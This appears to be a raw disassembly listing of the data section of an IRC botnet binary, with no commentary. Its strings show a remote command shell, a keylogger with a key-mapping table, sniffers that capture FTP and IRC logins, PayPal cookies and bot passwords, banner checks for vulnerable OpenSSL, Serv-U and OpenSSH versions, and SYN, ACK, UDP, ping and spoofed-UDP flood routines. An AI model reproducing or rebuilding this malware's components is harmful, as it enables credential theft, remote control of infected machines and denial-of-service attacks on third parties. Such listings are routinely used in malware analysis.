db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aErrorServerFai db '- Error: server failed, returned: <%d>.',0
align 4
; char asc_44B39C[]
asc_44B39C db '-' ; DATA XREF: sub_411756+59�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCreate db '- Failed to create ReadShell session thread, error: <%d>.',0
align 4
; char asc_44B3E4[]
asc_44B3E4 db '-' ; DATA XREF: sub_411756+8B�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCrea_0 db '- Failed to create ReadShell session thread, error: <%d>.',0
align 4
; char asc_44B42C[]
asc_44B42C db '-' ; DATA XREF: sub_411756+DE�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aWaitformultipl db '- WaitForMultipleObjects error: <%d>.',0
align 10h
unk_44B460 db 2Dh ; - ; DATA XREF: sub_4118A7+5C�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCrea_1 db '- Failed to create shell stdout pipe, error: <%d>.',0
; char asc_44B4A0[]
asc_44B4A0 db '-' ; DATA XREF: sub_4118A7+7E�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToCrea_2 db '- Failed to create shell stdin pipe, error: <%d>.',0
align 10h
unk_44B4E0 db 2Dh ; - ; DATA XREF: sub_4118A7+AF�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToExecut db '- Failed to execute shell.',0
aCmdQ db 'cmd /q',0 ; DATA XREF: sub_4119A0+8C�o
align 10h
; char asc_44B510[]
asc_44B510 db '-' ; DATA XREF: sub_4119A0+C3�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aFailedToExec_0 db '- Failed to execute shell, error: <%d>.',0
align 4
; char asc_44B548[]
asc_44B548 db '-' ; DATA XREF: sub_411A79+A1�o
db 3, 34h, 2
db 72h ; r
db 6Ch, 6Fh, 67h
db 69h ; i
db 6Eh, 64h, 2
db 3
aSessionreadshe db '- SessionReadShellThread exited, error: <%ld>.',0
; char asc_44B584[]
asc_44B584 db '-' ; DATA XREF: sub_411C4E+A8�o
db 3, 34h, 2
dd 6B636F73h, 3023473h
aServerStarte_5 db '- Server started on: %s:%d.',0
; char asc_44B5AC[]
asc_44B5AC db '-' ; DATA XREF: sub_411C4E+114�o
db 3, 34h, 2
dd 6B636F73h, 3023473h
aClientConnec_3 db '- Client connection from IP: %s:%d, Server thread: %d.',0
align 10h
; char asc_44B5F0[]
asc_44B5F0 db '-' ; DATA XREF: sub_411C4E+18F�o
db 3, 34h, 2
dd 6B636F73h, 3023473h
aFailedToSta_43 db '- Failed to start client thread, error: <%d>.',0
align 4
; char asc_44B62C[]
asc_44B62C db '-' ; DATA XREF: sub_411C4E+1B2�o
db 3, 34h, 2
dd 6B636F73h, 3023473h
aFailedToSta_44 db '- Failed to start server on Port %d.',0
align 10h
; char dword_44B660[]
dword_44B660 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411E53+F2�o
aAuthentication db '- Authentication failed. Remote userid: %s != %s.',0
align 10h
; char dword_44B6A0[]
dword_44B6A0 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411E53+18A�o
aErrorFailedToO db '- Error: Failed to open socket(), returned: <%d>.',0
align 10h
; char dword_44B6E0[]
dword_44B6E0 dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_411E53+1F9�o
aErrorFailedToC db '- Error: Failed to connect to target, returned: <%d>.',0
align 4
aOctet db 'octet',0
align 4
; char aRb_0[]
aRb_0 db 'rb',0 ; DATA XREF: sub_412217+130�o
align 10h
; char aTftpTransferSt[]
aTftpTransferSt db 'Tftp transfer started to: %s',0 ; DATA XREF: sub_412217+2CD�o
align 10h
; char aTftpTransferCo[]
aTftpTransferCo db 'Tftp transfer complete to: %s',0 ; DATA XREF: sub_412217+3C4�o
align 10h
dword_44B770 dd 4000500h, 7868746Bh, 2 dup(0) ; DATA XREF: sub_412217+41C�o
dd 8
dword_44B784 dd 62h, 62000000h, 2 dup(0) ; DATA XREF: sub_412775:loc_412858�o
dd 0Dh, 65h, 65000000h, 2 dup(0)
dd 1Bh, 4353455Bh, 5B00005Dh, 5D435345h, 0
dd 70h, 5D31465Bh, 5B000000h, 5D3146h, 0
dd 71h, 5D32465Bh, 5B000000h, 5D3246h, 0
dd 72h, 5D33465Bh, 5B000000h, 5D3346h, 0
dd 73h, 5D34465Bh, 5B000000h, 5D3446h, 0
dd 74h, 5D35465Bh, 5B000000h, 5D3546h, 0
dd 75h, 5D36465Bh, 5B000000h, 5D3646h, 0
dd 76h, 5D37465Bh, 5B000000h, 5D3746h, 0
dd 77h, 5D38465Bh, 5B000000h, 5D3846h, 0
dd 78h, 5D39465Bh, 5B000000h, 5D3946h, 0
dd 79h, 3031465Bh, 5B00005Dh, 5D303146h, 0
dd 7Ah, 3131465Bh, 5B00005Dh, 5D313146h, 0
dd 7Bh, 3231465Bh, 5B00005Dh, 5D323146h, 0
dd 0C0h, 60h, 7E000000h, 2 dup(0)
dd 2 dup(31h), 21000000h, 2 dup(0)
dd 2 dup(32h), 40000000h, 2 dup(0)
dd 2 dup(33h), 23000000h, 2 dup(0)
dd 2 dup(34h), 24000000h, 2 dup(0)
dd 2 dup(35h), 25000000h, 2 dup(0)
dd 2 dup(36h), 5E000000h, 2 dup(0)
dd 2 dup(37h), 26000000h, 2 dup(0)
dd 2 dup(38h), 2A000000h, 2 dup(0)
dd 2 dup(39h), 28000000h, 2 dup(0)
dd 2 dup(30h), 29000000h, 2 dup(0)
dd 0BDh, 2Dh, 5F000000h, 2 dup(0)
dd 0BBh, 3Dh, 2B000000h, 2 dup(0)
dd 9, 4241545Bh, 5B00005Dh, 5D424154h, 0
dd 51h, 71h, 51000000h, 2 dup(0)
dd 57h, 77h, 57000000h, 2 dup(0)
dd 45h, 65h, 45000000h, 2 dup(0)
dd 52h, 72h, 52000000h, 2 dup(0)
dd 54h, 74h, 54000000h, 2 dup(0)
dd 59h, 79h, 59000000h, 2 dup(0)
dd 55h, 75h, 55000000h, 2 dup(0)
dd 49h, 69h, 49000000h, 2 dup(0)
dd 4Fh, 6Fh, 4F000000h, 2 dup(0)
dd 50h, 70h, 50000000h, 2 dup(0)
dd 0DBh, 5Bh, 7B000000h, 2 dup(0)
dd 0DDh, 0
dd 7D000000h, 2 dup(0)
dd 41h, 61h, 61000000h, 2 dup(0)
dd 53h, 73h, 53000000h, 2 dup(0)
dd 44h, 64h, 44000000h, 2 dup(0)
dd 46h, 66h, 46000000h, 2 dup(0)
dd 47h, 67h, 47000000h, 2 dup(0)
dd 48h, 68h, 48000000h, 2 dup(0)
dd 4Ah, 6Ah, 4A000000h, 2 dup(0)
dd 4Bh, 6Bh, 4B000000h, 2 dup(0)
dd 4Ch, 6Ch, 4C000000h, 2 dup(0)
dd 0BAh, 3Bh, 3A000000h, 2 dup(0)
dd 0DEh, 27h, 22000000h, 2 dup(0)
dd 5Ah, 7Ah, 5A000000h, 2 dup(0)
dd 58h, 78h, 58000000h, 2 dup(0)
dd 43h, 63h, 43000000h, 2 dup(0)
dd 56h, 76h, 56000000h, 2 dup(0)
dd 42h, 62h, 42000000h, 2 dup(0)
dd 4Eh, 6Eh, 4E000000h, 2 dup(0)
dd 4Dh, 6Dh, 4D000000h, 2 dup(0)
dd 0BCh, 2Ch, 3C000000h, 2 dup(0)
dd 0BEh, 2Eh, 3E000000h, 2 dup(0)
dd 0BFh, 2Fh, 2E000000h, 3Fh, 0
dd 0DCh, 5Ch, 7C000000h, 2 dup(0)
dd 11h, 5254435Bh, 5B005D4Ch, 4C525443h, 5Dh, 5Bh, 4E49575Bh
dd 5B00005Dh, 5D4E4957h, 0
dd 2 dup(20h), 20000000h, 2 dup(0)
dd 5Ch, 4E49575Bh, 5B00005Dh, 5D4E4957h, 0
dd 2Ch, 5352505Bh, 5B005D43h, 43535250h, 5Dh, 91h, 4C43535Bh
dd 5B005D4Bh, 4B4C4353h, 5Dh, 2Dh, 534E495Bh, 5B00005Dh
dd 5D534E49h, 0
dd 24h, 4D4F485Bh, 5B005D45h, 454D4F48h, 5Dh, 21h, 5547505Bh
dd 5B005D50h, 50554750h, 5Dh, 2Eh, 4C45445Bh, 5B00005Dh
dd 5D4C4544h, 0
dd 23h, 444E455Bh, 5B00005Dh, 5D444E45h, 0
dd 22h, 4447505Bh, 5B005D4Eh, 4E444750h, 5Dh, 25h, 46454C5Bh
dd 5B005D54h, 5446454Ch, 5Dh, 26h, 5D50555Bh, 5B000000h
dd 5D5055h, 0
dd 27h, 4847525Bh, 5B005D54h, 54484752h, 5Dh, 28h, 574F445Bh
dd 5B005D4Eh, 4E574F44h, 5Dh, 90h, 4C4D4E5Bh, 5B005D4Bh
dd 4B4C4D4Eh, 5Dh, 6Fh, 2Fh, 2F000000h, 2 dup(0)
dd 6Ah, 2Ah, 2A000000h, 2 dup(0)
dd 6Dh, 2Dh, 2D000000h, 2 dup(0)
dd 6Bh, 2Bh, 2B000000h, 2 dup(0)
dd 60h, 30h, 30000000h, 2 dup(0)
dd 61h, 31h, 31000000h, 2 dup(0)
dd 62h, 32h, 32000000h, 2 dup(0)
dd 63h, 33h, 33000000h, 2 dup(0)
dd 64h, 34h, 34000000h, 2 dup(0)
dd 65h, 35h, 35000000h, 2 dup(0)
dd 66h, 36h, 36000000h, 2 dup(0)
dd 67h, 37h, 37000000h, 2 dup(0)
dd 68h
dword_44BEB4 dd 38h, 38000000h, 2 dup(0) ; DATA XREF: sub_412775+2B6�o
dd 69h, 39h, 39000000h, 2 dup(0)
dd 6Eh, 2Eh, 2E000000h, 2 dup(0)
; char asc_44BEEC[]
asc_44BEEC db '\',0 ; DATA XREF: sub_412694+2C�o
align 10h
; char aAb[]
aAb db 'ab',0 ; DATA XREF: sub_412694+4E�o
align 4
; char aDDDDDDS[]
aDDDDDDS db '[%d-%d-%d %d:%d:%d] %s',0Dh,0Ah,0 ; DATA XREF: sub_412694+88�o
align 10h
; char asc_44BF10[]
asc_44BF10 db '-' ; DATA XREF: sub_412694+AE�o
db 3, 34h, 2
dd 6C79656Bh, 302676Fh, 7325202Dh, 0
; char aSChangedWindow[]
aSChangedWindow db '%s (Changed Windows: %s)',0 ; DATA XREF: sub_412775+8F�o
align 10h
aSBufferFullS db '%s (Buffer full) (%s)',0 ; DATA XREF: sub_412775+1E5�o
align 4
; char aSReturnS[]
aSReturnS db '%s (Return) (%s)',0 ; DATA XREF: sub_412775+228�o
align 10h
off_44BF70 dd offset dword_44C7D8 ; DATA XREF: sub_412A56+2B9�r
dd offset dword_44C7DC
dd offset dword_44C7E0
dd offset aHttp_0 ; "HTTP"
; char a_login[]
a_login db ':.login',0 ; DATA XREF: sub_412A56+1DE�o
dd 3 dup(0)
dword_44BF94 dd 0 ; DATA XREF: sub_412A56+2B2�r
aLogin_3 db ':,login',0
dd 4 dup(0)
aLogin_4 db ':!login',0
dd 4 dup(0)
a@login db ':@login',0
dd 4 dup(0)
aLogin_5 db ':$login',0
dd 4 dup(0)
aLogin_6 db ':%login',0
dd 4 dup(0)
aLogin_7 db ':^login',0
dd 4 dup(0)
aLogin_8 db ':&login',0
dd 4 dup(0)
aLogin_9 db ':*login',0
dd 4 dup(0)
aLogin_10 db ':-login',0
dd 4 dup(0)
aLogin_11 db ':+login',0
dd 4 dup(0)
aLogin_12 db ':/login',0
dd 4 dup(0)
aLogin_13 db ':\login',0
dd 4 dup(0)
aLogin_14 db ':=login',0
dd 4 dup(0)
a?login db ':?login',0
dd 4 dup(0)
aLogin_15 db ':',27h,'login',0
dd 4 dup(0)
aLogin_16 db ':`login',0
dd 4 dup(0)
aLogin_17 db ':~login',0
dd 4 dup(0)
aLogin_18 db ': login',0
dd 4 dup(0)
a_auth db ':.auth',0
align 10h
dd 4 dup(0)
aAuth db ':,auth',0
align 4
dd 4 dup(0)
aAuth_0 db ':!auth',0
align 10h
dd 4 dup(0)
a@auth db ':@auth',0
align 4
dd 4 dup(0)
aAuth_1 db ':$auth',0
align 10h
dd 4 dup(0)
aAuth_2 db ':%auth',0
align 4
dd 4 dup(0)
aAuth_3 db ':^auth',0
align 10h
dd 4 dup(0)
aAuth_4 db ':&auth',0
align 4
dd 4 dup(0)
aAuth_5 db ':*auth',0
align 10h
dd 4 dup(0)
aAuth_6 db ':-auth',0
align 4
dd 4 dup(0)
aAuth_7 db ':+auth',0
align 10h
dd 4 dup(0)
aAuth_8 db ':/auth',0
align 4
dd 4 dup(0)
aAuth_9 db ':\auth',0
align 10h
dd 4 dup(0)
aAuth_10 db ':=auth',0
align 4
dd 4 dup(0)
a?auth db ':?auth',0
align 10h
dd 4 dup(0)
aAuth_11 db ':',27h,'auth',0
align 4
dd 4 dup(0)
aAuth_12 db ':`auth',0
align 10h
dd 4 dup(0)
aAuth_13 db ':~auth',0
align 4
dd 4 dup(0)
aAuth_14 db ': auth',0
align 10h
dd 4 dup(0)
a_id db ':.id',0
align 4
dd 4 dup(0)
aId_0 db ':,id',0
align 10h
dd 4 dup(0)
aId_1 db ':!id',0
align 4
dd 4 dup(0)
a@id db ':@id',0
align 10h
dd 4 dup(0)
aId_2 db ':$id',0
align 4
dd 4 dup(0)
aId_3 db ':%id',0
align 10h
dd 4 dup(0)
aId_4 db ':^id',0
align 4
dd 4 dup(0)
aId_5 db ':&id',0
align 10h
dd 4 dup(0)
aId_6 db ':*id',0
align 4
dd 4 dup(0)
aId_7 db ':-id',0
align 10h
dd 4 dup(0)
aId_8 db ':+id',0
align 4
dd 4 dup(0)
aId_9 db ':/id',0
align 10h
dd 4 dup(0)
aId_10 db ':\id',0
align 4
dd 4 dup(0)
aId_11 db ':=id',0
align 10h
dd 4 dup(0)
a?id db ':?id',0
align 4
dd 4 dup(0)
aId_12 db ':',27h,'id',0
align 10h
dd 4 dup(0)
aId_13 db ':`id',0
align 4
dd 4 dup(0)
aId_14 db ':~id',0
align 10h
dd 4 dup(0)
aId_15 db ': id',0
align 4
dd 4 dup(0)
a_hashin_0 db ':.hashin',0
align 10h
aHashin_0 db ':!hashin',0
align 4
dd 3 dup(0)
aHashin_1 db ':$hashin',0
align 10h
aHashin_2 db ':%hashin',0
align 4
dd 3 dup(0)
a_secure db ':.secure',0
align 10h
aSecure_2 db ':!secure',0
align 4
dd 3 dup(0)
dd 6C2E3Ah, 5 dup(0)
dd 6C213Ah, 5 dup(0)
dd 6C243Ah, 5 dup(0)
dd 6C253Ah, 5 dup(0)
dd 782E3Ah, 5 dup(0)
dd 78213Ah, 5 dup(0)
dd 78243Ah, 5 dup(0)
dd 78253Ah, 5 dup(0)
a_syn db ':.syn',0
align 10h
dd 4 dup(0)
aSyn_2 db ':!syn',0
align 4
dd 4 dup(0)
aSyn_3 db ':$syn',0
align 10h
dd 4 dup(0)
aSyn_4 db ':%syn',0
align 4
dd 4 dup(0)
aCdkey db ' CDKey ',0
dd 4 dup(0)
aJoin_2 db 'JOIN #',0
align 4
dd 3 dup(0)
dd 1, 4B43494Eh, 20h, 3 dup(0)
dd 1, 5245504Fh, 20h, 3 dup(0)
dd 1, 7265706Fh, 20h, 3 dup(0)
dd 1, 20776F6Eh, 49206E61h, 4F204352h, 61726570h, 726F74h
dd 1, 52455355h, 20h, 3 dup(0)
dd 2, 53534150h, 20h, 3 dup(0)
dd 2, 70796170h, 6C61h, 3 dup(0)
dd 3, 50594150h, 4C41h, 3 dup(0)
dd 3, 70796170h, 632E6C61h, 6D6Fh, 2 dup(0)
dd 3, 50594150h, 432E4C41h, 4D4Fh, 2 dup(0)
dd 3, 2D746553h, 6B6F6F43h, 3A6569h, 2 dup(0)
dd 3, 6 dup(0)
dword_44C7D8 dd 544F42h ; DATA XREF: .data:off_44BF70�o
dword_44C7DC dd 435249h ; DATA XREF: .data:0044BF74�o
dword_44C7E0 dd 505446h ; DATA XREF: .data:0044BF78�o
aHttp_0 db 'HTTP',0 ; DATA XREF: .data:0044BF7C�o
align 4
; char asc_44C7EC[]
asc_44C7EC db '-' ; DATA XREF: sub_412A56+85�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aSocketFailedRe db '- socket() failed, returned %d',0
align 4
; char asc_44C818[]
asc_44C818 db '-' ; DATA XREF: sub_412A56+103�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aBindFailedRetu db '- bind() failed, returned %d',0
align 4
; char asc_44C844[]
asc_44C844 db '-' ; DATA XREF: sub_412A56+186�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aWsaioctlFailed db '- WSAIoctl() failed, returned %d',0
align 4
; char asc_44C874[]
asc_44C874 db '-' ; DATA XREF: sub_412A56+317�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aRecvFailedRetu db '- recv() failed, returned %d',0
align 10h
; char aPsniff_0[]
aPsniff_0 db '[PSNIFF]',0 ; DATA XREF: sub_412A56+235�o
align 4
; char asc_44C8AC[]
asc_44C8AC db '-' ; DATA XREF: sub_412A56+24C�o
db 3, 34h, 2
dd 696E7370h, 3026666h, 2Dh
; char asc_44C8BC[]
asc_44C8BC db '-' ; DATA XREF: sub_412A56+2C6�o
db 3, 34h, 2
dd 696E7370h, 3026666h
aSuspiciousSPac db '- suspicious %s packet from: %s:%d - %s',0
; char aBotSniff[]
aBotSniff db 'Bot sniff',0 ; DATA XREF: sub_412DE1+5�o
align 4
; char aPsniff_1[]
aPsniff_1 db '[PSNIFF]:',0 ; DATA XREF: sub_412DE1+2B�o
align 4
; char aPsniff_2[]
aPsniff_2 db 'PSNIFF//',0 ; DATA XREF: sub_412DE1+3C�o
align 4
; char aJoin_1[]
aJoin_1 db 'JOIN #',0 ; DATA XREF: sub_412DE1+4D�o
align 4
; char a302[]
a302 db '302 ',0 ; DATA XREF: sub_412DE1:loc_412E43�o
align 4
; char a366[]
a366 db '366 ',0 ; DATA XREF: sub_412DE1+73�o
align 4
; char a_login_0[]
a_login_0 db ':.login',0 ; DATA XREF: sub_412DE1+84�o
; char aLogin_0[]
aLogin_0 db ':!login',0 ; DATA XREF: sub_412DE1+95�o
; char aLogin_1[]
aLogin_1 db ':!Login',0 ; DATA XREF: sub_412DE1+A6�o
; char a_login_1[]
a_login_1 db ':.Login',0 ; DATA XREF: sub_412DE1+B7�o
; char a_ident[]
a_ident db ':.ident',0 ; DATA XREF: sub_412DE1+C8�o
; char aIdent_0[]
aIdent_0 db ':!ident',0 ; DATA XREF: sub_412DE1+D9�o
; char a_hashin[]
a_hashin db ':.hashin',0 ; DATA XREF: sub_412DE1+EE�o
align 4
; char aHashin[]
aHashin db ':!hashin',0 ; DATA XREF: sub_412DE1+103�o
align 4
; char aIrcSniff[]
aIrcSniff db 'IRC sniff',0 ; DATA XREF: sub_412EF8+5�o
align 10h
; char aOper[]
aOper db 'OPER ',0 ; DATA XREF: sub_412EF8+2B�o
align 4
; char aNick_2[]
aNick_2 db 'NICK ',0 ; DATA XREF: sub_412EF8:loc_412F38�o
align 10h
; char aOper_0[]
aOper_0 db 'oper ',0 ; DATA XREF: sub_412EF8+51�o
align 4
; char aYouAreNowAnIrc[]
aYouAreNowAnIrc db 'You are now an IRC Operator',0 ; DATA XREF: sub_412EF8+62�o
; char aFtpSniff[]
aFtpSniff db 'FTP sniff',0 ; DATA XREF: sub_412F6E+5�o
align 10h
; char aNick_3[]
aNick_3 db 'NICK ',0 ; DATA XREF: sub_412F6E+2B�o
align 4
; char a220[]
a220 db '220 ',0 ; DATA XREF: sub_412F6E+3C�o
align 10h
; char a230[]
a230 db '230 ',0 ; DATA XREF: sub_412F6E:loc_412FBF�o
align 4
; char aUser_2[]
aUser_2 db 'USER ',0 ; DATA XREF: sub_412F6E+62�o
align 10h
; char aPass_0[]
aPass_0 db 'PASS ',0 ; DATA XREF: sub_412F6E+73�o
align 4
; char aHttpSniff[]
aHttpSniff db 'HTTP sniff',0 ; DATA XREF: sub_412FF5+5�o
align 4
; char aPaypal[]
aPaypal db 'paypal',0 ; DATA XREF: sub_412FF5+2B�o
align 4
; char aPaypal_0[]
aPaypal_0 db 'PAYPAL',0 ; DATA XREF: sub_412FF5:loc_413035�o
align 4
; char aPaypal_com[]
aPaypal_com db 'PAYPAL.COM',0 ; DATA XREF: sub_412FF5+51�o
align 10h
; char aPaypal_com_0[]
aPaypal_com_0 db 'paypal.com',0 ; DATA XREF: sub_412FF5+62�o
align 4
; char aSetCookie[]
aSetCookie db 'Set-Cookie:',0 ; DATA XREF: sub_412FF5+73�o
; char aVulnSniff[]
aVulnSniff db 'VULN sniff',0 ; DATA XREF: sub_41307C+5�o
align 4
; char aOpenssl0_9_6[]
aOpenssl0_9_6 db 'OpenSSL/0.9.6',0 ; DATA XREF: sub_41307C+2B�o
align 4
; char aServUFtpServer[]
aServUFtpServer db 'Serv-U FTP Server',0 ; DATA XREF: sub_41307C:loc_4130BC�o
align 4
; char aOpenssh_2[]
aOpenssh_2 db 'OpenSSH_2',0 ; DATA XREF: sub_41307C+51�o
align 4
; char asc_44CA64[]
asc_44CA64 db '-' ; DATA XREF: sub_4130E1+C5�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aBindFailedRe_0 db '- bind() failed, returned %d',0
align 10h
; char asc_44CA90[]
asc_44CA90 db '-' ; DATA XREF: sub_4130E1+14B�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aWsaioctlFail_0 db '- WSAIoctl() failed, returned %d',0
align 10h
; char aS_34[]
aS_34 db '%s',0 ; DATA XREF: sub_4130E1+228�o
align 4
; char aS_35[]
aS_35 db '%s',0 ; DATA XREF: sub_4130E1+250�o
align 4
unk_44CAC8 db 2Dh ; - ; DATA XREF: sub_4130E1+2E2�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aBotSniffSDToSD db '- Bot sniff "%s:%d" to "%s:%d": - "%s"',0
unk_44CAFC db 2Dh ; - ; DATA XREF: sub_4130E1+31B�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aIrcSniffSDToSD db '- IRC sniff "%s:%d" to "%s:%d": - "%s"',0
unk_44CB30 db 2Dh ; - ; DATA XREF: sub_4130E1+351�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aFtpSniffSDToSD db '- FTP sniff "%s:%d" to "%s:%d": - "%s"',0
; char asc_44CB64[]
asc_44CB64 db '-' ; DATA XREF: sub_4130E1+382�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aHttpSniffSDToS db '- HTTP sniff "%s:%d" to "%s:%d": - "%s"',0
align 4
unk_44CB9C db 2Dh ; - ; DATA XREF: sub_4130E1+3EC�o
db 3, 34h, 2
db 73h ; s
db 6Eh, 69h, 66h
db 66h ; f
db 65h, 72h, 2
db 3
aVulnSniffSDToS db '- VULN sniff "%s:%d" to "%s:%d": - "%s"',0
align 4
; char asc_44CBD4[]
asc_44CBD4 db '-' ; DATA XREF: sub_4134D4+5E�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aDoneWithFloodA db 'done with flood at %iKB/sec',0
; char aDdos_syn_0[]
aDdos_syn_0 db 'ddos.syn',0 ; DATA XREF: sub_413589+F1�o
align 4
; char aDdos_ack_0[]
aDdos_ack_0 db 'ddos.ack',0 ; DATA XREF: sub_413589:loc_413699�o
align 4
; char aDdos_random_0[]
aDdos_random_0 db 'ddos.random',0 ; DATA XREF: sub_413589:loc_4136B5�o
; char asc_44CC20[]
asc_44CC20 db '-' ; DATA XREF: sub_413589+302�o
db 3, 34h, 2
dd 736F6464h, 202D0302h, 646E6573h, 72726520h, 203A726Fh
dd 6425h
; char asc_44CC3C[]
asc_44CC3C db '-' ; DATA XREF: sub_41391E+49�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aSocketFailed_0 db 'socket() failed, returned %d',0
align 4
; char asc_44CC68[]
asc_44CC68 db '-' ; DATA XREF: sub_41391E+C2�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aSetsockoptFail db 'setsockopt() failed, returned %d',0
align 4
; char asc_44CC98[]
asc_44CC98 db '-' ; DATA XREF: sub_41391E+12A�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aInvalidTargetI db 'invalid target ip',0
align 4
; char asc_44CCB8[]
asc_44CCB8 db '-' ; DATA XREF: sub_41391E+307�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aErrorSendingPa db 'error sending packets to %s. %d packets sent, returned %d',0
align 10h
; char asc_44CD00[]
asc_44CD00 db '-' ; DATA XREF: sub_41391E+397�o
db 3, 34h, 2
db 69h ; i
db 63h, 6Dh, 70h
db 2
db 3, 2Dh, 20h
aDoneWithSFlood db 'done with %s flood to %s. sent %d packets @ %dKB/sec (%dMB).',0
align 4
; char asc_44CD4C[]
asc_44CD4C db '-' ; DATA XREF: sub_413D05+6E�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aErrorSendingPi db 'error sending pings to %s',0
align 4
; char asc_44CD74[]
asc_44CD74 db '-' ; DATA XREF: sub_413D05+13C�o
db 3, 34h, 2
db 70h ; p
db 69h, 6Eh, 67h
db 2
db 3, 2Dh, 20h
aFinishedSendin db 'finished sending pings to %s',0
align 10h
; char asc_44CDA0[]
asc_44CDA0 db '-' ; DATA XREF: sub_413E91+8E�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aErrorSending_0 db '- error sending packets to %s',0
align 4
; char asc_44CDC8[]
asc_44CDC8 db '-' ; DATA XREF: sub_413E91+1C6�o
db 3, 34h, 2
db 75h ; u
db 64h, 70h, 2
db 3
aFinishedSend_0 db '- finished sending packets to %s',0
align 4
; char asc_44CDF4[]
asc_44CDF4 db '-' ; DATA XREF: sub_4140A7+4B�o
db 3, 34h, 2
dd 73796B73h, 3026E79h
aDoneWithFloodI db '- Done with flood (%iKB/sec)',0
align 10h
; char asc_44CE20[]
asc_44CE20 db '-' ; DATA XREF: sub_41424D+4B�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aDoneWithFloo_0 db '- Done with flood (%iKB/sec).',0
align 4
; char asc_44CE48[]
asc_44CE48 db '-' ; DATA XREF: sub_4142EC+27D�o
db 3, 34h, 2
db 73h ; s
db 79h, 6Eh, 2
db 3
aSendErrorD_ db '- Send error: <%d>.',0
align 4
; char asc_44CE68[]
asc_44CE68 db '-' ; DATA XREF: sub_4145F8+4F�o
db 3, 34h, 2
dd 67726174h, 3023361h
aDoneWithFlood_ db '- Done with flood.',0
align 4
; char asc_44CE88[]
asc_44CE88 db '-' ; DATA XREF: sub_4148B6+70�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSocketFai db '- Error: socket() failed, returned: <%d>.',0
align 4
; char asc_44CEBC[]
asc_44CEBC db '-' ; DATA XREF: sub_4148B6+EE�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSetsockop db '- Error: setsockopt() failed, returned: <%d>.',0
align 4
; char asc_44CEF4[]
asc_44CEF4 db '-' ; DATA XREF: sub_4148B6+15F�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aInvalidTarge_0 db '- Invalid target IP.',0
align 4
; char aSyn_1[]
aSyn_1 db 'syn',0 ; DATA XREF: sub_4148B6+2D2�o
; char aAck_0[]
aAck_0 db 'ack',0 ; DATA XREF: sub_4148B6+2F2�o
; char aRandom_2[]
aRandom_2 db 'random',0 ; DATA XREF: sub_4148B6+312�o
align 4
; char asc_44CF24[]
asc_44CF24 db '-' ; DATA XREF: sub_4148B6+44F�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aErrorSending_1 db '- Error sending packets to IP: %s. Packets sent: %d. Returned: <%'
db 'd>.',0
align 4
; char asc_44CF74[]
asc_44CF74 db '-' ; DATA XREF: sub_4148B6+4EB�o
db 3, 34h, 2
db 74h ; t
db 63h, 70h, 2
db 3
aDoneWithSFlo_0 db '- Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%d'
db 'MB).',0
align 4
; char asc_44CFC4[]
asc_44CFC4 db '-' ; DATA XREF: sub_414E4C+66�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aDoneWithFloodD db '- Done with flood, %d packets sent.',0
align 4
; char aD_D_D_D_1[]
aD_D_D_D_1 db '%d.%d.%d.%d',0 ; DATA XREF: sub_414F04+C9�o
; char asc_44D004[]
asc_44D004 db '-' ; DATA XREF: sub_41514F+4D�o
db 3, 34h, 2
db 77h ; w
db 69h, 73h, 64h
db 6Fh ; o
db 6Dh, 28h, 75h
db 64h ; d
db 70h, 29h, 2
db 3
aStartingWisdom db '- Starting Wisdom spoofed UDP flood thread.',0
